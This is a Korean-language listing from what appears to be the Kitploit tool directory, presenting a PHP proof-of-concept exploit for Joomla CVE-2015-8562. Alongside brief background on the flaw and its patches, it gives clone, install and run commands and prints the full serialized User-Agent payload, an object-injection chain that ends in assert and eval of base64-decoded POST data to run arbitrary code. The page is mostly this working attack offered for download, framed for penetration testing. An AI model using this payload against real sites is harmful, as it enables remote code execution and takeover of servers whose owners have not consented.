Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Joomla-CVE-2015-8562-PHP-POC — Joomla의 CVE-2015-8562 취약점에 대한 개념 증명(PoC) | Kitploit
도구/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

Joomla의 CVE-2015-8562 취약점에 대한 개념 증명(PoC)

저장소 보기
2310년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Joomla-CVE-2015-8562-PHP-POC

Joomla CVE-2015-8562 취약점에 대한 개념 증명

Preview

소개

이 PoC는 Gary가 exploit-db에 호스팅한 Python 구현을 거의 1:1로 복사한 것입니다.

사용 방법

설치는 매우 쉽습니다:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

Composer가 모든 것을 설치하면 exploit.php에서 $target을 변경해야 합니다.

그 후에 바로 사용할 수 있습니다:

root@kitploit:~
php exploit.php

CVE-2015-8562

2015년 12월, Joomla에서 취약점이 발견되었습니다. 이 취약점을 통해 원격 공격자는 HTTP User-Agent 헤더를 통해 PHP 객체 주입 공격을 수행하고 임의의 PHP 코드를 실행할 수 있습니다.

이 취약점은 Joomla의 모든 버전에 영향을 미쳤습니다. v1.5.x, v2.5x 및 v3.x에 대한 패치는 이미 출시되었습니다.

PHP >= 5.4.45, >= 5.5.29 또는 >= 5.6.13을 실행 중이라면 이 익스플로잇이 CVE-2015-6835도 활용하므로 안전합니다.

PatrolServer의 Nikos Verschore는 매우 상세한 블로그 게시물을 작성했으며, 이 취약점을 이해하는 데 큰 도움이 되었습니다. 그들의 미니 스캐너를 무료로 사용하여 사이트가 위험에 처했는지 확인할 수 있습니다.

실제 익스플로잇

보내는 User-Agent 헤더는 다음과 같습니다:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
도구 다운로드